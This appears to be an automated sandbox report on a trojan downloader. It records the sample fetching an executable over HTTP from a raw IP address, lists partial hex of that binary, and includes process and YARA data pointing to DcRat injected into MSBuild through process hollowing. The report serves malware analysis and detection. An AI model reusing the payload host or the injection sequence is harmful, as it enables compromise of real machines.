                      Apr 12, 2025 19:37:20.853334904 CEST14144971477.223.119.85192.168.2.4
                      Apr 12, 2025 19:37:20.854588032 CEST497141414192.168.2.477.223.119.85
                      Apr 12, 2025 19:37:21.137610912 CEST14144971477.223.119.85192.168.2.4
                      Apr 12, 2025 19:37:21.137866974 CEST497141414192.168.2.477.223.119.85
                      Apr 12, 2025 19:37:21.418662071 CEST14144971477.223.119.85192.168.2.4
                      Apr 12, 2025 19:37:21.529067993 CEST14144971477.223.119.85192.168.2.4
                      Apr 12, 2025 19:37:21.578855038 CEST497141414192.168.2.477.223.119.85
                      Apr 12, 2025 19:37:21.806606054 CEST14144971477.223.119.85192.168.2.4
                      Apr 12, 2025 19:37:21.860117912 CEST497141414192.168.2.477.223.119.85

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Apr 12, 2025 19:35:29.844866037 CEST6317553192.168.2.41.1.1.1
                      Apr 12, 2025 19:35:29.951786995 CEST53631751.1.1.1192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Apr 12, 2025 19:35:29.844866037 CEST192.168.2.41.1.1.10x87d1Standard query (0)c.pki.googA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Apr 12, 2025 19:35:21.177337885 CEST1.1.1.1192.168.2.40x68f8No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                      Apr 12, 2025 19:35:21.177337885 CEST1.1.1.1192.168.2.40x68f8No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                      Apr 12, 2025 19:35:29.951786995 CEST1.1.1.1192.168.2.40x87d1No error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                      Apr 12, 2025 19:35:29.951786995 CEST1.1.1.1192.168.2.40x87d1No error (0)pki-goog.l.google.com64.233.185.94A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • 77.223.119.85
                      • c.pki.goog

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.44971377.223.119.85803928C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
                      TimestampBytes transferredDirectionData
                      Apr 12, 2025 19:35:14.663721085 CEST69OUTGET /tb.exe HTTP/1.1
                      Host: 77.223.119.85
                      Connection: Keep-Alive
                      Apr 12, 2025 19:35:14.891134024 CEST1358INHTTP/1.1 200 OK
                      Content-Type: application/octet-stream
                      Last-Modified: Tue, 08 Apr 2025 21:05:32 GMT
                      Accept-Ranges: bytes
                      ETag: "3466e6f6c9a8db1:0"
                      Server: Microsoft-IIS/10.0
                      Date: Sat, 12 Apr 2025 17:35:14 GMT
                      Content-Length: 1548800
                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 05 da d5 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 98 17 00 00 08 00 00 00 00 00 00 6e b7 17 00 00 20 00 00 00 c0 17 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 18 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 b7 17 00 57 00 00 00 00 c0 17 00 aa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 17 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELG"0n @ `W H.textt `.rsrc@@.reloc@BPH|WH3W3(]*(*2{(*s%rpor/po%r/pooo(*s%rpor;po%rEpooo(*V(#s$ o%*b~,~o&*f~( ,(,(*((('((*~**~ * *~!*!*~"*"*~#*#*~$*$*~%*%*~&*&*~'*~(*( [TRUNCATED]
                      Apr 12, 2025 19:35:14.891154051 CEST1358INData Raw: 00 04 2a 1e 02 80 2b 00 00 04 2a 46 02 7b 33 00 00 04 6f 1f 00 00 0a 28 53 00 00 06 2a 2e 73 67 00 00 06 80 36 00 00 04 2a 1a 28 4f 00 00 06 2a 1e 02 7b 3f 00 00 04 2a 22 02 03 7d 3f 00 00 04 2a 1e 02 7b 40 00 00 04 2a 82 02 03 7d 40 00 00 04 02
                      Data Ascii: *+*F{3o(S*.sg6*(O*{?*"}?*{@*}@s}=s}>*f((ns(l*{B*"}B*j(s}A(*{C*"}C***{E*{D*"}D*s}M(s
                      Apr 12, 2025 19:35:14.891164064 CEST1358INData Raw: 2a 56 72 83 20 00 70 7e 71 00 00 04 28 bf 00 00 0a 80 ee 01 00 04 2a 5e 02 28 c8 00 00 0a 03 6f cf 00 00 0a 28 4e 01 00 06 28 57 01 00 0a 2a 5e 28 c8 00 00 0a 02 03 28 c9 00 00 0a 28 50 01 00 06 6f ca 00 00 0a 2a 56 28 18 01 00 0a 72 63 21 00 70
                      Data Ascii: *Vr p~q(*^(o(N(W*^(((Po*V(rc!po*B-~+*oi*0cs%}((ss(+ ((-*0as
                      Apr 12, 2025 19:35:14.891170025 CEST1358INData Raw: 28 04 00 00 2b 80 0b 00 00 04 72 55 00 00 70 72 fb 00 00 70 28 05 00 00 2b 80 0c 00 00 04 72 55 00 00 70 72 1d 01 00 70 28 06 00 00 2b 80 0d 00 00 04 72 55 00 00 70 72 3b 01 00 70 28 07 00 00 2b 80 0e 00 00 04 72 55 00 00 70 72 61 01 00 70 28 08
                      Data Ascii: (+rUprp(+rUprp(+rUpr;p(+rUprap(+rprp(+rUprp(+*0s6% o7% o8(=(<~5o9o:T%:o;~5o9o:T%
                      Apr 12, 2025 19:35:14.891176939 CEST1358INData Raw: 01 28 00 00 02 00 55 00 4a 9f 00 0a 00 00 00 00 00 00 10 00 b4 c4 00 09 02 00 00 01 02 00 08 00 c5 cd 00 0a 00 00 00 00 13 30 05 00 56 01 00 00 05 00 00 11 73 18 00 00 0a 0a 06 02 74 01 00 00 1b 6f 19 00 00 0a 06 72 01 00 00 70 6f 1a 00 00 0a 6f
                      Data Ascii: (UJ0Vstorpoorp(9$rpoorp(-;r!p(-lr7p(-zrKp(:rUp(:*(Y,*(Zrqpoo[(\rpoo[(\
                      Apr 12, 2025 19:35:14.891187906 CEST1358INData Raw: 07 2c 06 06 28 59 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 09 00 35 3e 00 0a 00 00 00 00 13 30 03 00 29 00 00 00 09 00 00 11 02 7b 4b 00 00 04 0a 06 0b 07 03 28 7f 00 00 0a 74 20 00 00 02 0c 02 7c 4b 00 00 04 08 07 28 0b 00 00 2b 0a 06 07 33 df
                      Data Ascii: ,(Y*5>0){K(t |K(+3*0){K(t |K(+3*0){L(t |L(+3*0){L(t |L(
                      Apr 12, 2025 19:35:14.891192913 CEST1358INData Raw: 18 28 8e 00 00 0a 12 09 28 88 00 00 0a 11 08 11 19 6f 91 00 00 0a 13 18 12 18 28 76 00 00 0a 28 63 00 00 0a 16 13 1b 11 05 12 0d 28 75 00 00 0a 5a 13 1c 16 13 1d 2b 45 09 12 0d 28 8e 00 00 0a 11 1d 58 5a 11 05 12 0d 28 8f 00 00 0a 5a 58 13 1e 11
                      Data Ascii: ((o(v(c(uZ+E(XZ(ZXXX(,XX(&X(v29oYo1uo(o(uX(3Go(u(uX (
                      Apr 12, 2025 19:35:14.891199112 CEST1358INData Raw: 04 00 62 00 00 00 00 00 00 00 02 28 17 00 00 0a 02 7e 9b 00 00 0a 03 6a 73 9c 00 00 0a 7d 50 00 00 04 02 02 72 f7 03 00 70 28 ad 00 00 06 7d 51 00 00 04 02 18 73 9d 00 00 0a 7d 52 00 00 04 02 7b 52 00 00 04 6f 9e 00 00 0a 16 02 7b 50 00 00 04 a2
                      Data Ascii: b(~js}Prp(}Qs}R{Ro{P{Ro~js*0.sg{Q{Room,oW*"0.(iY+o(,*X1
                      Apr 12, 2025 19:35:14.891210079 CEST1358INData Raw: 7d 62 00 00 04 18 17 1c 73 36 00 00 0a 25 20 00 c8 00 00 6f 37 00 00 0a 25 20 00 c8 00 00 6f 38 00 00 0a 28 be 00 00 06 28 bd 00 00 06 7e 01 00 00 04 6f 39 00 00 0a 6f 3a 00 00 0a 17 8d 54 00 00 01 25 16 1f 3a 9d 6f 3b 00 00 0a 16 9a 7e 01 00 00
                      Data Ascii: }bs6% o7% o8((~o9o:T%:o;~o9o:T%:o;(<o=(o>9((s?s@sA(((o9o:T%:o; oBj((L
                      Apr 12, 2025 19:35:14.891222000 CEST1358INData Raw: 00 06 de 03 26 de 00 00 7e 70 00 00 04 28 20 00 00 0a 2c 0c 28 1f 01 00 06 2c 05 28 45 01 00 06 de 03 26 de 00 00 7e 66 00 00 04 28 20 00 00 0a 2c 05 28 fe 00 00 06 de 03 26 de 00 28 25 01 00 06 28 1f 01 00 06 2c 05 28 27 01 00 06 de 03 26 de 00
                      Data Ascii: &~p( ,(,(E&~f( ,(&(%(,('&(-((& (+X-@HW[nr0;(~i(oi
                      Apr 12, 2025 19:35:15.118050098 CEST1358INData Raw: 00 00 0a 6f 3a 00 00 0a 17 8d 54 00 00 01 25 16 1f 3a 9d 6f 3b 00 00 0a 16 9a 14 20 c0 00 00 00 16 6f 42 00 00 0a 1a 6a 28 e5 00 00 06 28 e4 00 00 06 d4 8d 4c 00 00 01 28 e3 00 00 06 16 6a 28 e7 00 00 06 28 1e 01 00 06 28 f8 00 00 06 16 28 f0 00
                      Data Ascii: o:T%:o; oBj((L(j(((((sCsD ' :oEsD ' :oEsF(sCsF((((i(isGoH&+(&(*AL


                      Session IDSource IPSource PortDestination IPDestination Port
                      1192.168.2.44972364.233.185.9480
                      TimestampBytes transferredDirectionData
                      Apr 12, 2025 19:35:30.059125900 CEST202OUTGET /r/gsr1.crl HTTP/1.1
                      Cache-Control: max-age = 3000
                      Connection: Keep-Alive
                      Accept: */*
                      If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                      User-Agent: Microsoft-CryptoAPI/10.0
                      Host: c.pki.goog
                      Apr 12, 2025 19:35:30.167119026 CEST1358INHTTP/1.1 200 OK
                      Accept-Ranges: bytes
                      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                      Cross-Origin-Resource-Policy: cross-origin
                      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                      Content-Length: 1739
                      X-Content-Type-Options: nosniff
                      Server: sffe
                      X-XSS-Protection: 0
                      Date: Sat, 12 Apr 2025 17:10:18 GMT
                      Expires: Sat, 12 Apr 2025 18:00:18 GMT
                      Cache-Control: public, max-age=3000
                      Age: 1512
                      Last-Modified: Mon, 07 Apr 2025 13:58:00 GMT
                      Content-Type: application/pkix-crl
                      Vary: Accept-Encoding
                      Data Raw: 30 82 06 c7 30 82 05 af 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 57 31 0b 30 09 06 03 55 04 06 13 02 42 45 31 19 30 17 06 03 55 04 0a 13 10 47 6c 6f 62 61 6c 53 69 67 6e 20 6e 76 2d 73 61 31 10 30 0e 06 03 55 04 0b 13 07 52 6f 6f 74 20 43 41 31 1b 30 19 06 03 55 04 03 13 12 47 6c 6f 62 61 6c 53 69 67 6e 20 52 6f 6f 74 20 43 41 17 0d 32 35 30 34 30 37 30 30 30 30 30 30 5a 17 0d 32 35 30 37 31 35 30 30 30 30 30 30 5a 30 82 04 f1 30 2a 02 0b 04 00 00 00 00 01 1e 44 a5 e4 04 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 29 45 c3 a8 0f 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 20 19 c1 8d 68 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 2c 5e 7f 1a 88 17 0d 31 34 31 31 32 35 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2a 02 0b 04 00 00 00 00 01 15 4b 5a [TRUNCATED]
                      Data Ascii: 000*H0W10UBE10UGlobalSign nv-sa10URoot CA10UGlobalSign Root CA250407000000Z250715000000Z00*D141125000000Z00U0*)E141125000000Z00U0* h141125000000Z00U0*,^141125000000Z00U0*KZ160107000000Z00U0*/NIR170419000000Z00U0*/NG170419000000Z00U0*/N9191120000000Z00U0*/N=k191204000000Z00U0*/N;X191204000000Z00U0-Ga7.u200630000000Z00U0-G
                      Apr 12, 2025 19:35:30.167136908 CEST1095INData Raw: 18 9d c0 41 1c 9f 3e 54 68 41 17 0d 32 30 30 36 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2d 02 0e 47 c3 10 00 c0 4b fa 8a 26 54 b7 41 ec 2b 17 0d 32 30 30 36 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04
                      Data Ascii: A>ThA200630000000Z00U0-GK&TA+200630000000Z00U0*6::200711160000Z00U0/vSBS%V>200728000000Z00U0/vSF-Kg>)200728000000Z00U0/vSHqe]c
                      Apr 12, 2025 19:35:30.173396111 CEST200OUTGET /r/r4.crl HTTP/1.1
                      Cache-Control: max-age = 3000
                      Connection: Keep-Alive
                      Accept: */*
                      If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                      User-Agent: Microsoft-CryptoAPI/10.0
                      Host: c.pki.goog
                      Apr 12, 2025 19:35:30.281279087 CEST1242INHTTP/1.1 200 OK
                      Accept-Ranges: bytes
                      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                      Cross-Origin-Resource-Policy: cross-origin
                      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                      Content-Length: 530
                      X-Content-Type-Options: nosniff
                      Server: sffe
                      X-XSS-Protection: 0
                      Date: Sat, 12 Apr 2025 17:28:41 GMT
                      Expires: Sat, 12 Apr 2025 18:18:41 GMT
                      Cache-Control: public, max-age=3000
                      Age: 409
                      Last-Modified: Thu, 03 Apr 2025 14:18:00 GMT
                      Content-Type: application/pkix-crl
                      Vary: Accept-Encoding
                      Data Raw: 30 82 02 0e 30 82 01 93 02 01 01 30 0a 06 08 2a 86 48 ce 3d 04 03 03 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 34 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 17 0d 32 36 30 32 32 38 30 37 35 39 35 39 5a 30 81 e9 30 2f 02 10 6e 47 a9 ce 4f 46 c2 3d e2 49 ea cc 38 94 53 73 17 0d 31 39 30 39 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 f0 9c 5b 70 05 a6 dc 86 e2 f9 9e f3 17 0d 32 30 30 31 33 31 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 fe a5 81 44 7e 3b fd 3b b8 1c 24 98 17 0d 32 33 30 36 31 33 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 16 68 25 e1 70 04 40 61 24 91 f5 40 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 00 8e b2 58 e7 b5 94 0c 1f f9 00 44 17 0d 32 35 30 [TRUNCATED]
                      Data Ascii: 000*H=0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R4250403080000Z260228075959Z00/nGOF=I8Ss190930000000Z00U0,[p200131000000Z00U0,D~;;$230613000000Z00U0,h%p@a$@250403080000Z00U0,XD250403080000Z00U/0-0U0U#0LtI6>j0*H=i0f1>2en:IN@g=;bQZ~`NX1?^4y[$\4{;$zDeU6O


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:13:35:13
                      Start date:12/04/2025
                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe"
                      Imagebase:0xd20000
                      File size:472'480 bytes
                      MD5 hash:9308044D486D7B3F5FFEE3F41D3F7881
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1176630709.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1176630709.0000000004419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:1
                      Start time:13:35:16
                      Start date:12/04/2025
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline"
                      Imagebase:0x9e0000
                      File size:2'141'552 bytes
                      MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:2
                      Start time:13:35:16
                      Start date:12/04/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff62fc20000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:3
                      Start time:13:35:16
                      Start date:12/04/2025
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8956.tmp" "c:\Users\user\AppData\Local\Temp\5dljncsi\CSC46F1B711EF3E491E90EFFC96C5EAD74.TMP"
                      Imagebase:0x810000
                      File size:46'832 bytes
                      MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:13:35:17
                      Start date:12/04/2025
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      Imagebase:0x9d0000
                      File size:262'432 bytes
                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2388462794.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000004.00000002.2388462794.000000000300F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2388462794.000000000300F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2387305116.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2387305116.0000000001083000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2384955038.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:3.7%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:37
                        Total number of Limit Nodes:2
                        execution_graph 15008 5672fe8 15010 567300c 15008->15010 15009 567341f 15010->15009 15011 5672430 Wow64SetThreadContext 15010->15011 15012 5672438 Wow64SetThreadContext 15010->15012 15015 56729d2 WriteProcessMemory 15010->15015 15016 56729d8 WriteProcessMemory 15010->15016 15024 5672c54 15010->15024 15028 5672c60 15010->15028 15032 5672ac2 15010->15032 15036 5672ac8 15010->15036 15040 5672912 15010->15040 15044 5672918 15010->15044 15048 5672504 15010->15048 15053 5672388 15010->15053 15057 5672380 15010->15057 15011->15010 15012->15010 15015->15010 15016->15010 15025 5672c5f CreateProcessA 15024->15025 15027 5672eab 15025->15027 15029 5672ce9 CreateProcessA 15028->15029 15031 5672eab 15029->15031 15033 5672aaf 15032->15033 15033->15032 15034 5672b26 ReadProcessMemory 15033->15034 15035 5672b57 15034->15035 15035->15010 15037 5672b13 ReadProcessMemory 15036->15037 15039 5672b57 15037->15039 15039->15010 15041 5672958 VirtualAllocEx 15040->15041 15043 5672995 15041->15043 15043->15010 15045 5672958 VirtualAllocEx 15044->15045 15047 5672995 15045->15047 15047->15010 15050 5672505 15048->15050 15049 5672552 15050->15049 15051 5672962 VirtualAllocEx 15050->15051 15052 5672995 15051->15052 15052->15010 15054 56723c8 ResumeThread 15053->15054 15056 56723f9 15054->15056 15056->15010 15058 56723c8 ResumeThread 15057->15058 15060 56723f9 15058->15060 15060->15010

                        Executed Functions

                        Function 05672504 Relevance: 2.1, APIs: 1, Instructions: 572COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 5672504 1 5672505-5672529 0->1 4 567252b-5672531 1->4 5 5672533-5672539 4->5 6 5672552-567255f 4->6 5->1 8 567253c-5672549 5->8 8->4 9 567254b-5672551 8->9 9->6 10 5672572-5672993 VirtualAllocEx 9->10 14 5672995-567299b 10->14 15 567299c-56729c1 10->15 14->15
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cadd7ecc132fbf879a7e050e9440eaf3491e086988c0712c109f0d84f392cc3f
                        • Instruction ID: 0fbcd302fdae6f3fa03bdaaf3679d1ea45d1f6611a94c2e39648783203cf9609
                        • Opcode Fuzzy Hash: cadd7ecc132fbf879a7e050e9440eaf3491e086988c0712c109f0d84f392cc3f
                        • Instruction Fuzzy Hash: 9541F736C083898FDB12DFA9C8617CABFF1EF46214F19448BC441EB262D6349919CBA1
                        Function 05672C54 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 19 5672c54-5672c5d 20 5672c5f-5672c7d 19->20 21 5672c7e-5672cf5 19->21 20->21 23 5672cf7-5672d01 21->23 24 5672d2e-5672d4e 21->24 23->24 25 5672d03-5672d05 23->25 29 5672d87-5672db6 24->29 30 5672d50-5672d5a 24->30 27 5672d07-5672d11 25->27 28 5672d28-5672d2b 25->28 31 5672d15-5672d24 27->31 32 5672d13 27->32 28->24 40 5672def-5672ea9 CreateProcessA 29->40 41 5672db8-5672dc2 29->41 30->29 33 5672d5c-5672d5e 30->33 31->31 34 5672d26 31->34 32->31 35 5672d81-5672d84 33->35 36 5672d60-5672d6a 33->36 34->28 35->29 38 5672d6e-5672d7d 36->38 39 5672d6c 36->39 38->38 42 5672d7f 38->42 39->38 52 5672eb2-5672f38 40->52 53 5672eab-5672eb1 40->53 41->40 43 5672dc4-5672dc6 41->43 42->35 44 5672de9-5672dec 43->44 45 5672dc8-5672dd2 43->45 44->40 47 5672dd6-5672de5 45->47 48 5672dd4 45->48 47->47 49 5672de7 47->49 48->47 49->44 63 5672f3a-5672f3e 52->63 64 5672f48-5672f4c 52->64 53->52 63->64 65 5672f40-5672f43 call 5670fc0 63->65 66 5672f4e-5672f52 64->66 67 5672f5c-5672f60 64->67 65->64 66->67 69 5672f54-5672f57 call 5670fc0 66->69 70 5672f62-5672f66 67->70 71 5672f70-5672f74 67->71 69->67 70->71 73 5672f68-5672f6b call 5670fc0 70->73 74 5672f86-5672f8d 71->74 75 5672f76-5672f7c 71->75 73->71 77 5672fa4 74->77 78 5672f8f-5672f9e 74->78 75->74 80 5672fa5 77->80 78->77 80->80
                        APIs
                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05672E96
                        Memory Dump Source
                        • Source File: 00000000.00000002.1177152256.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5670000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: b062c24d783f18cc67323a344ae16b7e0c9650259e3288552fd7569a947a62fe
                        • Instruction ID: 18373d68f56adaaa15f8a8b83cccf898fbb74c0ffe78eae2dea13e7c522242e0
                        • Opcode Fuzzy Hash: b062c24d783f18cc67323a344ae16b7e0c9650259e3288552fd7569a947a62fe
                        • Instruction Fuzzy Hash: 17A17D75D0061D9FEB20CF68C855BEDBBB2BF48310F148169E819A7340DB749A85CF91
                        Function 05672C60 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 81 5672c60-5672cf5 83 5672cf7-5672d01 81->83 84 5672d2e-5672d4e 81->84 83->84 85 5672d03-5672d05 83->85 89 5672d87-5672db6 84->89 90 5672d50-5672d5a 84->90 87 5672d07-5672d11 85->87 88 5672d28-5672d2b 85->88 91 5672d15-5672d24 87->91 92 5672d13 87->92 88->84 100 5672def-5672ea9 CreateProcessA 89->100 101 5672db8-5672dc2 89->101 90->89 93 5672d5c-5672d5e 90->93 91->91 94 5672d26 91->94 92->91 95 5672d81-5672d84 93->95 96 5672d60-5672d6a 93->96 94->88 95->89 98 5672d6e-5672d7d 96->98 99 5672d6c 96->99 98->98 102 5672d7f 98->102 99->98 112 5672eb2-5672f38 100->112 113 5672eab-5672eb1 100->113 101->100 103 5672dc4-5672dc6 101->103 102->95 104 5672de9-5672dec 103->104 105 5672dc8-5672dd2 103->105 104->100 107 5672dd6-5672de5 105->107 108 5672dd4 105->108 107->107 109 5672de7 107->109 108->107 109->104 123 5672f3a-5672f3e 112->123 124 5672f48-5672f4c 112->124 113->112 123->124 125 5672f40-5672f43 call 5670fc0 123->125 126 5672f4e-5672f52 124->126 127 5672f5c-5672f60 